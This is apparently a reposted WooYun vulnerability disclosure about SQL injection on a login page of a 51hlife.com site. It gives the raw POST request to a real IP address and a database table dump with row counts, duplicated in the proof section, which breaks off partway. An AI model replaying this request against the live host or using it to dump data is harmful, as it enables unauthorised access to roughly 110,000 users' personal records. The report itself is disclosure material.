好生活某站存在注入泄露大量信息(11w用户)

admin
admin
admin
140798
文章
117
评论
2017年3月26日10:56:12评论557 views字数 219阅读0分43秒阅读模式
摘要

2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2016-187040

漏洞标题: 好生活某站存在注入泄露大量信息(11w用户)

相关厂商: 51hlife.com

漏洞作者: 路人甲

提交时间: 2016-03-21 10:50

公开时间: 2016-05-05 10:50

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /Login.aspx?doFrom=index HTTP/1.1

Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://202.101.47.116/Login.aspx?doFrom=index

Accept-Language: zh-CN

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: 202.101.47.116

Content-Length: 496

Pragma: no-cache

Cookie: ASP.NET_SessionId=rqf2vmi1bqg5bjsajntalhm2; ad_play_index=68; IESESSION=alive

Connection: close

__VIEWSTATE=%2FwEPDwUKMTAyNDcwNTk2NQ9kFgJmD2QWAgIDD2QWAgIBD2QWAgIDDxYCHgRUZXh0BUw8c3BhbiBjbGFzcz0ncmVkJz7mgqjpnIDopoHnmbvlvZXlkI7miY3og73ov5vooYzmk43kvZzvvIHor7fnmbvlvZXvvIE8L3NwYW4%2BZGSaI%2Bp%2BNtwfLi30igBXJr5AuilPQdYbZ%2FX4Nnhha8OakA%3D%3D&__EVENTVALIDATION=%2FwEWBAKr1PLcAwLoksmACQKTpbW1BALQl%2FnLCLxAz9%2F%2F8h77uKkAVCl1u1lt4gPTU57SMhPFmOz%2FqsQU&ctl00%24ContentPlaceHolder%24userName=asdasd&ctl00%24ContentPlaceHolder%24passWord=sadasd&ctl00%24ContentPlaceHolder%24BtSave=%E7%99%BB%E5%85%A5

好生活某站存在注入泄露大量信息(11w用户)

好生活某站存在注入泄露大量信息(11w用户)

至于这个是多少信息,好多表都是数十万的

code 区域 
Database: BGJK
 +--------------------------------+---------+
 | Table                          | Entries |
 +--------------------------------+---------+
 | BROWSELOG                      | 65228213 |
 | LOG                            | 6002734 |
 | BROWSELOG_BK                   | 5258329 |
 | T_HPP_PERSON_INSURE            | 3265887 |
 | USERACCOUNTDETAIL              | 2370927 |
 | T_JS_OPERATING_NEW             | 2315658 |
 | USERACCOUNTDETAIL_BAK_2016     | 2288436 |
 | HC_CLIENTLOG                   | 2122350 |
 | Z_BK_USERACCOUNTDETAIL_2012    | 2009544 |
 | USERACCOUNTDETAIL_ARCHIVE      | 1672548 |
 | Z_BK_T_JS_OPERATING_NEW_2015   | 1590677 |
 | Z_BK_USERACCOUNTDETAIL_2015    | 1556540 |
 | Z_BK_USERACCOUNTDETAIL_2014    | 1506670 |
 | Z_USERACCOUNTDETAIL_1410_BK    | 1475764 |
 | T_JS_OPERATING_DTL             | 1014584 |
 | T_JS_OPERATING_DTL_BAK_2016    | 1014584 |
 | SENDSMS                        | 869665  |
 | Z_BK_T_JS_OPERATING_NEW_2014   | 796957  |
 | Z_BK_T_JS_OPERATING_DTL_2015   | 772989  |
 | BMI_INFO                       | 757456  |
 | T_HPP_ITEM_RULE                | 540488  |
 | HC_T_HPP_ITEM_RULE             | 523966  |
 | Z_BK_T_JS_OPERATING_DTL_2014   | 479775  |
 | LOG_BK                         | 408842  |
 | T_SMS_SEND                     | 306356  |
 | SMS_ORGCOUNT                   | 298738  |
 | SMS_ORGCOUNT_REAL              | 298738  |
 | T_JS_DATAVALIDATION            | 298182  |
 | T_JS_STATISTICSDATADTL_JG      | 285594  |
 | T_JS_S_D_DTL_JG_BK_2016        | 275549  |
 | Z_BK_T_JS_SDATADTL_JG_2015     | 202663  |
 | T_JS_STATISTICSDATADTL_CG      | 188994  |
 | T_JS_S_D_DTL_CG_BK_2016        | 182386  |
 | T_HPP_USERDETAIL               | 180820  |
 | Z_BK_T_JS_DATAVALIDATION_2015  | 180266  |
 | REPORT_BASIS                   | 148986  |
 | LOG_BGAL                       | 140058  |
 | Z_BK_T_JS_SDATADTL_CG_2015     | 137810  |
 | USERICCARD                     | 115907  |
 | USERICCARD_BAK_2016            | 115221  |
 | USERINFO                       | 114938  |
 | Z_BK_USERICCARD_2015           | 114329  |
 | USERINFO_BAK_2016              | 113450  |
 | T_JS_STATISTICSDATAMST         | 111548  |
 | Z_BK_USERINFO_2015             | 108417  |
 | T_JS_S_D_MST_BAK_2016          | 107849  |
 | T_JS_STATISTICSD_MST_BAK_2016  | 107849  |
 | USERACCOUNT                    | 102087  |
 | Z_BK_T_JS_SDATADTL_JG_2014     | 101558  |
 | USERACCOUNT_BAK_2016           | 100588  |
 | MOBILEVALIDATION               | 97494   |
 | Z_BK_USERACCOUNT_2015          | 96023   |
 | ITEMBOOKORDER                  | 89304   |
 | Z_BK_USERICCARD_2014           | 86667   |
 | Z_BK_USERINFO_2014             | 82302   |
 | Z_BK_T_JS_DATAVALIDATION_2014  | 78737   |
 | T_SECKILL_USERDETAIL           | 75053   |
 | Z_BK_USERACCOUNT_2014          | 73840   |
 | ORGINFO                        | 70675   |
 | Z_BK_T_JS_SDATADTL_CG_2014     | 68497   |
 | T_CONSUMPTIONDATA              | 68050   |
 | JS_INVOICEMONTH_MXDTL          | 67720   |
 | JS_INVOICEMONTH_MXDTL_BAK_2016 | 67720   |
 | Z_BK_JS_INVOICEM_MXDTL_2015    | 67720   |
 | REPORT_BASIS_JS                | 64190   |
 | T_XT_ORGANIZATION              | 63171   |
 | PX_SURVEY_EMP                  | 61410   |
 | T_XT_ORGANIZATIONHIERARCHY     | 61039   |
 | T_HPP_SYS_DEDUCTTIMING         | 59687   |
 | T_XLZX_REVIEW                  | 56184   |
 | SMS_INTERFACE_DETECTION        | 50735   |
 | Z_BK_T_JS_SDATAMST_2015        | 50250   |
 | Z_BK_T_JS_SDATAMST_2012        | 47554   |
 | ORGANIZATIONS                  | 43939   |
 | HC_T_HPP_ITEM_PRICE            | 43853   |
 | SMS_ASSIGNINFO                 | 43697   |
 | T_HPP_ITEM_PRICE               | 43591   |
 | DOWNLOADRECORDDTL              | 39052   |
 | JS_INVOICEMONTH_MX             | 38442   |
 | JS_INVOICEMONTH_MX_BAK_2016    | 38442   |
 | Z_BK_JS_INVOICEMONTH_MX_2015   | 38442   |
 | Z_BK_T_HPP_ITEM_PRICE_2015     | 37516   |
 | SMS_EMPINFO                    | 37356   |
 | SMS_MOBILE                     | 37350   |
 | SMS_MOBILE_BAK                 | 37350   |
 | ORGINFO_NEW                    | 35723   |
 | QUESTIONNAIRE_DETAIL           | 35678   |
 | SMS_ORGANIZATIONS              | 35181   |
 | SMS_ORGANIZATIONS_BAK          | 35181   |
 | Z_BK_T_JS_SDATAMST_2014        | 29023   |
 | T_JS_DATAINTERFACE             | 27990   |
 | T_CONSUMPTIONDATA_LOG          | 27833   |
 | T_JS_SETTLEMENTPATTERN         | 26518   |
 | JS_ORG_BASIS_DATA_MX           | 23368   |
 | TEMP002                        | 23170   |
 | TEMP_EMP                       | 22836   |
 | PX_SERVICE                     | 22588   |
 | CHANGEPWDURL                   | 20263   |
 | ITEM_APPRECIATION              | 19344   |
 | Z_BK_T_JS_SMPATTERN_2015       | 19285   |
 | T_OY_GAME                      | 19011   |
 | T_SMS_BATCHPERSON              | 15745   |
 | Z_BK_T_HPP_ITEM_PRICE_2014     | 15236   |
 | Z_BK_T_JS_DATAINTERFACE_2015   | 13857   |
 | HC_T_HPP_ITEM                  | 13308   |
 | T_HPP_ITEM                     | 13148   |
 | JS_INVOICEMONTH                | 13070   |
 | JS_INVOICEMONTH_BAK_2016       | 13070   |
 | Z_BK_JS_INVOICEMONTH_2015      | 13070   |
 | Z_T_JS_DATAINTERFACE_10_BK     | 13070   |
 | T_MEMBERMONEYCHANGERECORD      | 12995   |
 | JS_ORG_BASIS_DATA              | 12632   |
 | PX_MBBACKUP                    | 11710   |
 | Z_BK_T_HPP_ITEM_2015           | 11448   |
 | INNERMAIL                      | 11001   |
 | T_SMS_BATCH                    | 10832   |
 | Z_BK_T_JS_SMPATTERN_2014       | 9504    |
 | FRIEND_WEIGHT                  | 9347    |
 | JS_INVOICE                     | 8694    |
 | JS_INVOICE_BAK_2016            | 8694    |
 | Z_BK_JS_INVOICE_2015           | 8694    |
 | T_SMS_BATCHGROUP               | 8284    |
 | JS_INVOICE_MX                  | 8160    |
 | JS_INVOICE_MX_BAK_2016         | 8160    |
 | Z_BK_JS_INVOICE_MX_2015        | 8160    |
 | TRAINAPPLICATION               | 7510    |
 | TEMP01                         | 6937    |
 | PX_LOG                         | 5412    |
 | T_HPP_ITEM_BK                  | 5115    |
 | HC_T_HPP_ITEM_BAK              | 5045    |
 | TRAINTIMETABLE                 | 5039    |
 | SYN_TASK_DAY4ITEMBOOK          | 4407    |
 | CABLEPOINT                     | 4100    |
 | DX_RTEMP                       | 3839    |
 | Z_BK_T_JS_DATAINTERFACE_2014   | 3265    |
 | GENERAL_TEAM                   | 2607    |
 | USERINFOLD                     | 2556    |
 | SYN_TASK_DAY                   | 2331    |
 | USERHEADINFO                   | 2162    |
 | USERHEADINFO                   | 2162    |
 | T_HPP_LESSMSG                  | 2161    |
 | TEMP_SRWE                      | 2140    |
 | ORGSUMMARY_BASIS               | 2106    |
 | COMPLAINTREMARK                | 1972    |
 | QUESTIONNAIRE_LIST             | 1960    |
 | H_SUBJECT_LIST                 | 1727    |
 | T_HPP_USERDETAIL_PRICE         | 1551    |
 | USERTRUSTEESHIP                | 1534    |
 | BSE_TEMP                       | 1510    |
 | T_MEMBERCARDINFO               | 1510    |
 | SYN_TASK_DAY4PUSH              | 1388    |
 | USER_TICKETSRECOURDINFO        | 1377    |
 | T_XT_USERINGROUP               | 1322    |
 | T_JS_DATAINTERFACE_USER        | 1298    |
 | COMPLAINTS                     | 1288    |
 | TRAINTIMECARD                  | 1113    |
 | JS_TRAINTEAM                   | 1098    |
 | GENERAL_INFO                   | 990     |
 | T_XT_USER                      | 836     |
 | T_HPP_ITEMSET                  | 835     |
 | TRAINTEACHEREVALUATION         | 818     |
 | HC_NX                          | 744     |
 | TRAINNOTICE                    | 729     |
 | T_SMS_BATCHTEMPORARYPHONE      | 720     |
 | PERSONAL_FRIEND                | 674     |
 | PX_PRE_ORDER                   | 656     |
 | T_XT_USER_TEST                 | 640     |
 | USERINROLE                     | 597     |
 | SMS_LOG                        | 570     |
 | TRAINTEAM                      | 463     |
 | ITEM_TEMP2_YN                  | 452     |
 | ANNOUNCEMENTINFO               | 443     |
 | VENUE                          | 443     |
 | TEMP001                        | 372     |
 | HC_T_DP_IMAGES                 | 354     |
 | ITEM                           | 341     |
 | BLOG_BLOGMST                   | 322     |
 | Z_BK_VENUE_2015                | 319     |
 | DATADICTIONARY                 | 316     |
 | Z_BK_ITEM_2014                 | 313     |
 | T_JS_OBJECTION                 | 266     |
 | AD_MANAGE                      | 253     |
 | BLOG_READBLOG                  | 252     |
 | VENUE_BACK                     | 252     |
 | ORGANIZATIONSSYNSETTING        | 239     |
 | T_XLZX_KNOWLEDGE               | 235     |
 | PLAY_REGISTER                  | 227     |
 | Z_BK_VENUE_2014                | 226     |
 | JS_ORG_SETTING                 | 224     |
 | T_JS_OPERATINGCONFIG           | 219     |
 | HC_T_TXFL_TAGCLASS             | 204     |
 | VENUEAPPRECIATION              | 203     |
 | T_TXFL_TAGCLASS                | 201     |
 | Z_BK_T_JS_OPERATINGCONFIG_2015 | 195     |
 | FRIEND_MESSAGE                 | 187     |
 | Z_BK_DATADICTIONARY_2015       | 184     |
 | Z_BK_T_JS_OBJECTION_2015       | 184     |
 | PX_SURVEY_OPTION               | 179     |
 | T_XT_SCHEDULEDTASK             | 179     |
 | Z_BK_DATADICTIONARY_2014       | 164     |
 | JS_INSTITUTION                 | 160     |
 | T_JS_OBJECTION_DTL             | 160     |
 | TRAINTEACHER                   | 156     |
 | USERORDER                      | 152     |
 | SMS_CONFIG                     | 150     |
 | SMS_CONFIG_TMP                 | 149     |
 | T_ITEMPRICEROUND               | 149     |
 | Z_BK_T_JS_OPERATINGCONFIG_2014 | 144     |
 | JS_OPERATIONMANAGEMENTFEE      | 128     |
 | ITEMWEBBOOK                    | 123     |
 | QUESTIONNAIRE_ANSWERS          | 122     |
 | PX_HARDWARE                    | 107     |
 | T_MEMBERCARDINFO_BAK           | 91      |
 | Z_BK_T_JS_OBJECTION_DTL_2015   | 84      |
 | T_JKCF_COOKERKNOW              | 77      |
 | T_XT_GROUP                     | 74      |
 | FRIEND_PHOTOALBUMMASTER        | 70      |
 | SMS_TEMPLATE                   | 70      |
 | FRIEND_PHOTOALBUMDTL           | 69      |
 | Z_BK_T_JS_OBJECTION_2014       | 69      |
 | T_JS_COSTINGCODE               | 66      |
 | Z_BK_T_JS_COSTINGCODE_2014     | 66      |
 | Z_BK_T_JS_COSTINGCODE_2015     | 66      |
 | TEMPDATAVALIDATION             | 64      |
 | T_SMS_BATCHORGANIZATION        | 55      |
 | T_JS_MECHANISMTABLE            | 51      |
 | T_XLZX_TALK_DTL                | 48      |
 | REGISTRATIONDETAIL             | 46      |
 | FL_QY_CORPWELFARE              | 44      |
 | PX_HARDWAREMOD                 | 44      |
 | TRAINNOTICE_BAK                | 44      |
 | PX_SURVEY_TITLE                | 40      |
 | QUESTIONNAIRE_SUBJECT          | 36      |
 | Z_BK_T_JS_MECHANISMTABLE_2015  | 36      |
 | T_ALPHAINFO                    | 33      |
 | SYN_TASK_MONTH                 | 32      |
 | T_FIELD                        | 30      |
 | T_XT_SMSTEMPLATE               | 29      |
 | PX_DTL                         | 28      |
 | T_XL_EVALUATE                  | 28      |
 | T_XT_USERINROLE                | 28      |
 | Z_BK_T_JS_OBJECTION_DTL_2014   | 28      |
 | PLAY_PLACE                     | 27      |
 | T_SECKILL_ITEM                 | 27      |
 | DATATREE                       | 26      |
 | ITEMCLASSIFICATION             | 24      |
 | T_HPP_BOOKS                    | 24      |
 | Z_BK_ITEMCLASSIFICATION_2014   | 24      |
 | Z_BK_ITEMCLASSIFICATION_2015   | 24      |
 | Z_BK_T_JS_MECHANISMTABLE_2014  | 24      |
 | FL_SH_WELFAREINFO              | 23      |
 | T_HPP_WEEKEND_TJ               | 23      |
 | USER_XINHUAESTORE              | 23      |
 | T_XL_COUNSELING                | 22      |
 | COMMUNITY_TYPE                 | 21      |
 | RESERVATION                    | 21      |
 | T_ORGINFO                      | 21      |
 | BNA_USER_LOAD                  | 20      |
 | HC_FIRSTVIEWSETTING            | 20      |
 | ROLES                          | 20      |
 | FL_SH_MERCHANTINFO             | 19      |
 | MOBILE_VERSION                 | 19      |
 | T_JS_L2ORDER                   | 16      |
 | SERVICE_CERT                   | 15      |
 | FL_YG_ACCOUNT                  | 14      |
 | T_XT_APPENDPARAMETER           | 12      |
 | PX_HITEGG_SURVEY_AW_WIN        | 11      |
 | PX_MST                         | 11      |
 | T_ITEMPRICE                    | 11      |
 | COMMUNITY_HOME                 | 10      |
 | FL_YG_CONSUMPTIONDETAIL        | 10      |
 | PX_EMP                         | 10      |
 | SKL_REPORT                     | 10      |
 | T_STADIUM                      | 10      |
 | T_XLZX_TALK                    | 10      |
 | HC_CLIENTSETTING               | 9       |
 | T_ITEM                         | 9       |
 | T_STADIUMHIERARCHY             | 9       |
 | PLAY_NOTICE                    | 8       |
 | T_ADMINUSER                    | 8       |
 | T_GIVEMONEYINFO                | 8       |
 | TEAM_ACTIVITIES                | 8       |
 | COMMUNITY_INDEX                | 7       |
 | FL_QY_WELFARETYPEMAX           | 7       |
 | H_LIST_MODULE                  | 7       |
 | DOWNLOADRECORD                 | 5       |
 | EXCEPTION_PROCESSING           | 5       |
 | FRIEND_GROUPS                  | 5       |
 | ITEM_TEMP_YN                   | 5       |
 | PX_HITEGG_SURVEY_AW            | 5       |
 | T_JS_OPERATINGCONFIG_USER      | 5       |
 | T_XT_CATEGORY                  | 5       |
 | T_XT_ROLE                      | 5       |
 | VENUE_PLACE                    | 5       |
 | REGISTRATIONINFORMATION        | 4       |
 | T_HJ_ZF                        | 4       |
 | T_MEMBERINFO                   | 4       |
 | T_MEMBERTYPE                   | 4       |
 | T_SENDADMINSMS                 | 4       |
 | FL_SH_FORECLOSURE              | 3       |
 | QUESTIONNAIRE_BATCH            | 3       |
 | SMS_BATCH                      | 3       |
 | HC_BASEDTL                     | 2       |
 | HC_BASEMST                     | 2       |
 | ORDERSETTING                   | 2       |
 | PX_SURVEY                      | 2       |
 | T_XT_PROVIDERACCOUNT           | 2       |
 | KNOWLEDGECATAGRY               | 1       |
 | PX_COOPERATION                 | 1       |
 | PX_HITEGG_SURVEY               | 1       |
 | T_HJ_NAME                      | 1       |
 | T_TXFL_OPENDATE                | 1       |
 | T_XT_ORGACCOUNTRELEVANCE       | 1       |
 | T_XT_PROVIDER                  | 1       |
 +--------------------------------+---------+

泄露用户信息

好生活某站存在注入泄露大量信息(11w用户)

漏洞证明:

POST /Login.aspx?doFrom=index HTTP/1.1

Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://202.101.47.116/Login.aspx?doFrom=index

Accept-Language: zh-CN

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: 202.101.47.116

Content-Length: 496

Pragma: no-cache

Cookie: ASP.NET_SessionId=rqf2vmi1bqg5bjsajntalhm2; ad_play_index=68; IESESSION=alive

Connection: close

__VIEWSTATE=%2FwEPDwUKMTAyNDcwNTk2NQ9kFgJmD2QWAgIDD2QWAgIBD2QWAgIDDxYCHgRUZXh0BUw8c3BhbiBjbGFzcz0ncmVkJz7mgqjpnIDopoHnmbvlvZXlkI7miY3og73ov5vooYzmk43kvZzvvIHor7fnmbvlvZXvvIE8L3NwYW4%2BZGSaI%2Bp%2BNtwfLi30igBXJr5AuilPQdYbZ%2FX4Nnhha8OakA%3D%3D&__EVENTVALIDATION=%2FwEWBAKr1PLcAwLoksmACQKTpbW1BALQl%2FnLCLxAz9%2F%2F8h77uKkAVCl1u1lt4gPTU57SMhPFmOz%2FqsQU&ctl00%24ContentPlaceHolder%24userName=asdasd&ctl00%24ContentPlaceHolder%24passWord=sadasd&ctl00%24ContentPlaceHolder%24BtSave=%E7%99%BB%E5%85%A5

好生活某站存在注入泄露大量信息(11w用户)

好生活某站存在注入泄露大量信息(11w用户)

至于这个是多少信息,好多表都是数十万的

code 区域 
Database: BGJK
 +--------------------------------+---------+
 | Table                          | Entries |
 +--------------------------------+---------+
 | BROWSELOG                      | 65228213 |
 | LOG                            | 6002734 |
 | BROWSELOG_BK                   | 5258329 |
 | T_HPP_PERSON_INSURE            | 3265887 |
 | USERACCOUNTDETAIL              | 2370927 |
 | T_JS_OPERATING_NEW             | 2315658 |
 | USERACCOUNTDETAIL_BAK_2016     | 2288436 |
 | HC_CLIENTLOG                   | 2122350 |
 | Z_BK_USERACCOUNTDETAIL_2012    | 2009544 |
 | USERACCOUNTDETAIL_ARCHIVE      | 1672548 |
 | Z_BK_T_JS_OPERATING_NEW_2015   | 1590677 |
 | Z_BK_USERACCOUNTDETAIL_2015    | 1556540 |
 | Z_BK_USERACCOUNTDETAIL_2014    | 1506670 |
 | Z_USERACCOUNTDETAIL_1410_BK    | 1475764 |
 | T_JS_OPERATING_DTL             | 1014584 |
 | T_JS_OPERATING_DTL_BAK_2016    | 1014584 |
 | SENDSMS                        | 869665  |
 | Z_BK_T_JS_OPERATING_NEW_2014   | 796957  |
 | Z_BK_T_JS_OPERATING_DTL_2015   | 772989  |
 | BMI_INFO                       | 757456  |
 | T_HPP_ITEM_RULE                | 540488  |
 | HC_T_HPP_ITEM_RULE             | 523966  |
 | Z_BK_T_JS_OPERATING_DTL_2014   | 479775  |
 | LOG_BK                         | 408842  |
 | T_SMS_SEND                     | 306356  |
 | SMS_ORGCOUNT                   | 298738  |
 | SMS_ORGCOUNT_REAL              | 298738  |
 | T_JS_DATAVALIDATION            | 298182  |
 | T_JS_STATISTICSDATADTL_JG      | 285594  |
 | T_JS_S_D_DTL_JG_BK_2016        | 275549  |
 | Z_BK_T_JS_SDATADTL_JG_2015     | 202663  |
 | T_JS_STATISTICSDATADTL_CG      | 188994  |
 | T_JS_S_D_DTL_CG_BK_2016        | 182386  |
 | T_HPP_USERDETAIL               | 180820  |
 | Z_BK_T_JS_DATAVALIDATION_2015  | 180266  |
 | REPORT_BASIS                   | 148986  |
 | LOG_BGAL                       | 140058  |
 | Z_BK_T_JS_SDATADTL_CG_2015     | 137810  |
 | USERICCARD                     | 115907  |
 | USERICCARD_BAK_2016            | 115221  |
 | USERINFO                       | 114938  |
 | Z_BK_USERICCARD_2015           | 114329  |
 | USERINFO_BAK_2016              | 113450  |
 | T_JS_STATISTICSDATAMST         | 111548  |
 | Z_BK_USERINFO_2015             | 108417  |
 | T_JS_S_D_MST_BAK_2016          | 107849  |
 | T_JS_STATISTICSD_MST_BAK_2016  | 107849  |
 | USERACCOUNT                    | 102087  |
 | Z_BK_T_JS_SDATADTL_JG_2014     | 101558  |
 | USERACCOUNT_BAK_2016           | 100588  |
 | MOBILEVALIDATION               | 97494   |
 | Z_BK_USERACCOUNT_2015          | 96023   |
 | ITEMBOOKORDER                  | 89304   |
 | Z_BK_USERICCARD_2014           | 86667   |
 | Z_BK_USERINFO_2014             | 82302   |
 | Z_BK_T_JS_DATAVALIDATION_2014  | 78737   |
 | T_SECKILL_USERDETAIL           | 75053   |
 | Z_BK_USERACCOUNT_2014          | 73840   |
 | ORGINFO                        | 70675   |
 | Z_BK_T_JS_SDATADTL_CG_2014     | 68497   |
 | T_CONSUMPTIONDATA              | 68050   |
 | JS_INVOICEMONTH_MXDTL          | 67720   |
 | JS_INVOICEMONTH_MXDTL_BAK_2016 | 67720   |
 | Z_BK_JS_INVOICEM_MXDTL_2015    | 67720   |
 | REPORT_BASIS_JS                | 64190   |
 | T_XT_ORGANIZATION              | 63171   |
 | PX_SURVEY_EMP                  | 61410   |
 | T_XT_ORGANIZATIONHIERARCHY     | 61039   |
 | T_HPP_SYS_DEDUCTTIMING         | 59687   |
 | T_XLZX_REVIEW                  | 56184   |
 | SMS_INTERFACE_DETECTION        | 50735   |
 | Z_BK_T_JS_SDATAMST_2015        | 50250   |
 | Z_BK_T_JS_SDATAMST_2012        | 47554   |
 | ORGANIZATIONS                  | 43939   |
 | HC_T_HPP_ITEM_PRICE            | 43853   |
 | SMS_ASSIGNINFO                 | 43697   |
 | T_HPP_ITEM_PRICE               | 43591   |
 | DOWNLOADRECORDDTL              | 39052   |
 | JS_INVOICEMONTH_MX             | 38442   |
 | JS_INVOICEMONTH_MX_BAK_2016    | 38442   |
 | Z_BK_JS_INVOICEMONTH_MX_2015   | 38442   |
 | Z_BK_T_HPP_ITEM_PRICE_2015     | 37516   |
 | SMS_EMPINFO                    | 37356   |
 | SMS_MOBILE                     | 37350   |
 | SMS_MOBILE_BAK                 | 37350   |
 | ORGINFO_NEW                    | 35723   |
 | QUESTIONNAIRE_DETAIL           | 35678   |
 | SMS_ORGANIZATIONS              | 35181   |
 | SMS_ORGANIZATIONS_BAK          | 35181   |
 | Z_BK_T_JS_SDATAMST_2014        | 29023   |
 | T_JS_DATAINTERFACE             | 27990   |
 | T_CONSUMPTIONDATA_LOG          | 27833   |
 | T_JS_SETTLEMENTPATTERN         | 26518   |
 | JS_ORG_BASIS_DATA_MX           | 23368   |
 | TEMP002                        | 23170   |
 | TEMP_EMP                       | 22836   |
 | PX_SERVICE                     | 22588   |
 | CHANGEPWDURL                   | 20263   |
 | ITEM_APPRECIATION              | 19344   |
 | Z_BK_T_JS_SMPATTERN_2015       | 19285   |
 | T_OY_GAME                      | 19011   |
 | T_SMS_BATCHPERSON              | 15745   |
 | Z_BK_T_HPP_ITEM_PRICE_2014     | 15236   |
 | Z_BK_T_JS_DATAINTERFACE_2015   | 13857   |
 | HC_T_HPP_ITEM                  | 13308   |
 | T_HPP_ITEM                     | 13148   |
 | JS_INVOICEMONTH                | 13070   |
 | JS_INVOICEMONTH_BAK_2016       | 13070   |
 | Z_BK_JS_INVOICEMONTH_2015      | 13070   |
 | Z_T_JS_DATAINTERFACE_10_BK     | 13070   |
 | T_MEMBERMONEYCHANGERECORD      | 12995   |
 | JS_ORG_BASIS_DATA              | 12632   |
 | PX_MBBACKUP                    | 11710   |
 | Z_BK_T_HPP_ITEM_2015           | 11448   |
 | INNERMAIL                      | 11001   |
 | T_SMS_BATCH                    | 10832   |
 | Z_BK_T_JS_SMPATTERN_2014       | 9504    |
 | FRIEND_WEIGHT                  | 9347    |
 | JS_INVOICE                     | 8694    |
 | JS_INVOICE_BAK_2016            | 8694    |
 | Z_BK_JS_INVOICE_2015           | 8694    |
 | T_SMS_BATCHGROUP               | 8284    |
 | JS_INVOICE_MX                  | 8160    |
 | JS_INVOICE_MX_BAK_2016         | 8160    |
 | Z_BK_JS_INVOICE_MX_2015        | 8160    |
 | TRAINAPPLICATION               | 7510    |
 | TEMP01                         | 6937    |
 | PX_LOG                         | 5412    |
 | T_HPP_ITEM_BK                  | 5115    |
 | HC_T_HPP_ITEM_BAK              | 5045    |
 | TRAINTIMETABLE                 | 5039    |
 | SYN_TASK_DAY4ITEMBOOK          | 4407    |
 | CABLEPOINT                     | 4100    |
 | DX_RTEMP                       | 3839    |
 | Z_BK_T_JS_DATAINTERFACE_2014   | 3265    |
 | GENERAL_TEAM                   | 2607    |
 | USERINFOLD                     | 2556    |
 | SYN_TASK_DAY                   | 2331    |
 | USERHEADINFO                   | 2162    |
 | USERHEADINFO                   | 2162    |
 | T_HPP_LESSMSG                  | 2161    |
 | TEMP_SRWE                      | 2140    |
 | ORGSUMMARY_BASIS               | 2106    |
 | COMPLAINTREMARK                | 1972    |
 | QUESTIONNAIRE_LIST             | 1960    |
 | H_SUBJECT_LIST                 | 1727    |
 | T_HPP_USERDETAIL_PRICE         | 1551    |
 | USERTRUSTEESHIP                | 1534    |
 | BSE_TEMP                       | 1510    |
 | T_MEMBERCARDINFO               | 1510    |
 | SYN_TASK_DAY4PUSH              | 1388    |
 | USER_TICKETSRECOURDINFO        | 1377    |
 | T_XT_USERINGROUP               | 1322    |
 | T_JS_DATAINTERFACE_USER        | 1298    |
 | COMPLAINTS                     | 1288    |
 | TRAINTIMECARD                  | 1113    |
 | JS_TRAINTEAM                   | 1098    |
 | GENERAL_INFO                   | 990     |
 | T_XT_USER                      | 836     |
 | T_HPP_ITEMSET                  | 835     |
 | TRAINTEACHEREVALUATION         | 818     |
 | HC_NX                          | 744     |
 | TRAINNOTICE                    | 729     |
 | T_SMS_BATCHTEMPORARYPHONE      | 720     |
 | PERSONAL_FRIEND                | 674     |
 | PX_PRE_ORDER                   | 656     |
 | T_XT_USER_TEST                 | 640     |
 | USERINROLE                     | 597     |
 | SMS_LOG                        | 570     |
 | TRAINTEAM                      | 463     |
 | ITEM_TEMP2_YN                  | 452     |
 | ANNOUNCEMENTINFO               | 443     |
 | VENUE                          | 443     |
 | TEMP001                        | 372     |
 | HC_T_DP_IMAGES                 | 354     |
 | ITEM                           | 341     |
 | BLOG_BLOGMST                   | 322     |
 | Z_BK_VENUE_2015                | 319     |
 | DATADICTIONARY                 | 316     |
 | Z_BK_ITEM_2014                 | 313     |
 | T_JS_OBJECTION                 | 266     |
 | AD_MANAGE                      | 253     |
 | BLOG_READBLOG                  | 252     |
 | VENUE_BACK                     | 252     |
 | ORGANIZATIONSSYNSETTING        | 239     |
 | T_XLZX_KNOWLEDGE               | 235     |
 | PLAY_REGISTER                  | 227     |
 | Z_BK_VENUE_2014                | 226     |
 | JS_ORG_SETTING                 | 224     |
 | T_JS_OPERATINGCONFIG           | 219     |
 | HC_T_TXFL_TAGCLASS             | 204     |
 | VENUEAPPRECIATION              | 203     |
 | T_TXFL_TAGCLASS                | 201     |
 | Z_BK_T_JS_OPERATINGCONFIG_2015 | 195     |
 | FRIEND_MESSAGE                 | 187     |
 | Z_BK_DATADICTIONARY_2015       | 184     |
 | Z_BK_T_JS_OBJECTION_2015       | 184     |
 | PX_SURVEY_OPTION               | 179     |
 | T_XT_SCHEDULEDTASK             | 179     |
 | Z_BK_DATADICTIONARY_2014       | 164     |
 | JS_INSTITUTION                 | 160     |
 | T_JS_OBJECTION_DTL             | 160     |
 | TRAINTEACHER                   | 156     |
 | USERORDER                      | 152     |
 | SMS_CONFIG                     | 150     |
 | SMS_CONFIG_TMP                 | 149     |
 | T_ITEMPRICEROUND               | 149     |
 | Z_BK_T_JS_OPERATINGCONFIG_2014 | 144     |
 | JS_OPERATIONMANAGEMENTFEE      | 128     |
 | ITEMWEBBOOK                    | 123     |
